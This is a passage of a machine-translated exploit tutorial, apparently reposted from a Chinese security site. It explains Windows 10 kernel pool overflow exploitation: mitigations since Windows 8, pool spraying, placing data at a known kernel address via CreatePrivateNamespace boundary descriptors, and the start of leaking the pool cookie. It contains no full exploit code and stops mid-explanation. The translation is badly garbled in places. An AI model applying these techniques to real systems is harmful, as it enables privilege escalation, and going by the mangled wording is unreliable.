Kernel pool overflow exploit combat of Windows 10-bug warning-the black bar safety net

ID MYHACK58:62201788466
Type myhack58
Reporter 佚名
Modified 2017-08-09T00:00:00


One, Foreword This is the kernel pool overflow exploit combat of Windows 7 throughout the sequel, we will be in the Windows 10 system to achieve the same exploits, it will be more challenging because of Microsoft ever since Windows 8 has taken a lot for the kernel pool attacks defenses. This article will be more in-depth analysis of pool-related content, so readers are advised to first read the first post in order for bedding. 1.1 Windows 8 system protective measures Windows 8 system in the pool to take a series of safety improvement measures, in here I do not make exhaustive list, but we can focus on this points: a. Real security link/broken link b. Pool index: the pool index covering the attack has long been not what difficult thing. c. No execute nonpaged pool No-Execute: this is a new type of non-paged pool, it can be said non-paged pool is not the NX Version, Windows use by default the type of the pool instead of the conventional non-paged pool d. SMEP: management mode execution protection e. MIN_MAP_ADDR: memory first address 0x1000 is reserved address and cannot be assigned, this can be Defense of the empty reference class of vulnerabilities, this protection has been in the Windows 7 system and 64-bit Vista system is compromised f. NtQuerySystemInformation()defect: the defect in the low integrity of the scene, which is usually the browser sandbox no longer can be used About us the use of the quota process pointer overwrite vulnerability described is as follows: a. Process pointer is currently through the cookies for the coding: 1). Process pointers in the allocated block when coded as follows: the ExpPoolQuotaCookie exclusive or ChunkAddress exclusive or ProcessPointer 2). Block idle when the process pointer is used as the canary and the following coding: ExpPoolQuotaCookie exclusive or ChunkAddress b. The process pointer is decoded must point to the kernel space otherwise it will trigger the anomaly detection If you want to know about detailed Windows 8 on this aspect of the mitigation measures you can read about this article[1] On Windows 8 system stack internal analysis, and in addition the authors Tarjei Mandt of another article[2] in the windows 7 system The use of the kernel pool vulnerability, referred to each of the attack techniques have already been effectively mitigated. Windows 8 systems do have by controlling the RIP Protocol to obtain data could be used, but these vulnerabilities in the Windows 10 system has been adopted in OBJECT_HEADER set cookies to be repaired. So if you want to achieve the use of the quota process pointer overwrite vulnerability this in the Windows 7 system The use of means of attack, we need to do: 1 pool Cookies PoolCookie):use it to correctly encode pointer 2. the overflow block address: also need to use it to encode pointer 3 known address of the kernel space of arbitrary data: we not only want to correct the encoding pointer, the pointer pointing to the kernel space at the same time also want to point to our fake of a structure. Let's give it a try! Second, get the overflow block pointer This part will be brief, provided that you remember the Windows 7 system under the Basic use of the pool jet technology, well, it's time to zoom trick, we will use Advanced pool jet technology, the technology in this article[3] The Windows kernel pool jet technology are described. Using the text of the method, we can predict any possible allocation behavior, of course with the IOCTL vulnerability we can easily know the input output Manager assigned to the system buffer, SystemBuffer address, since the system buffer, SystemBuffer is overflow, we spill the blocks in the system buffer, SystemBuffer, so we can get the block address. Note: I previously mentioned a couple of times, NtQuerySystemInformation vulnerability in a low integrity scenario of non-use, and therefore we cannot in the low integrity level to get this address but at least at a medium integrity level. Third, the obtain the known address of the kernel space of some arbitrary data There are several ways you can achieve this goal, the past a long time, I was using the pool jet technology combined with random IOCTL system call from the idle kernel space to store the data, but this approach is not reliable, since then I found a more reliable method. CreatePrivateNamespace function is used in the paging pool is assigned a directory object, the following is the function definition: HANDLE WINAPI CreatePrivateNamespace( _In_opt LPSECURITY_ATTRIBUTES lpPrivateNamespaceAttributes, In LPVOID lpBoundaryDescriptor, In LPCTSTR lpAliasPrefix ); Attractive places: 1)The function returns a handle, which is normal because it's just an object, but this means that we can be in the paged pool to get the directory object's address. 2)The function of the second parameter is a boundary descriptor, it must be unique, so you can use CreateBoundaryDescriptor function to create it: a. Function definition HANDLE WINAPI CreateBoundaryDescriptor( In LPCTSTR Name, In ULONG Flags ); b. Call the function after assigning a value to a variable, let's play a HelloWorld! Key point: boundary descriptor name directly stored in the paged pool the objects, so the following code

! Shows paged pool block:

! The Hello World! Of The Name stored in the object address+0x1A8 offset, look for the name no limit:

! Here the block size becomes a prior twice as large, however is just used to stored the boundary descriptor. By the way a little, since the size of the object can be controlled, it becomes so paged pool jet powerful tool. Anyway, we have been able to be in the kernel space to store some arbitrary data, and also you can use NtQuerySystemInformation vulnerability to obtain its address. Fourth, access to the pool Cookie The atmosphere seemed to suddenly tense up. ExpPoolQuotaCookie is driven by generating a pointer size of 8 bytes Cookie 64-bit system, its entropy enough security, we have no way to guess or calculate its value. At first glance the only access pools of the cookie way is to find powerful but rarely any reading vulnerability, so I studied ExpPoolQuotaCookie the use of the process. When in the process of the quota management process in a cell block is utilized, the cell type PoolType will set the quota bit(FF Bit), and there is a bit in the pool after the first 8 bytes of the 64-bit system of encoding the pointer to it:

[1] [2] next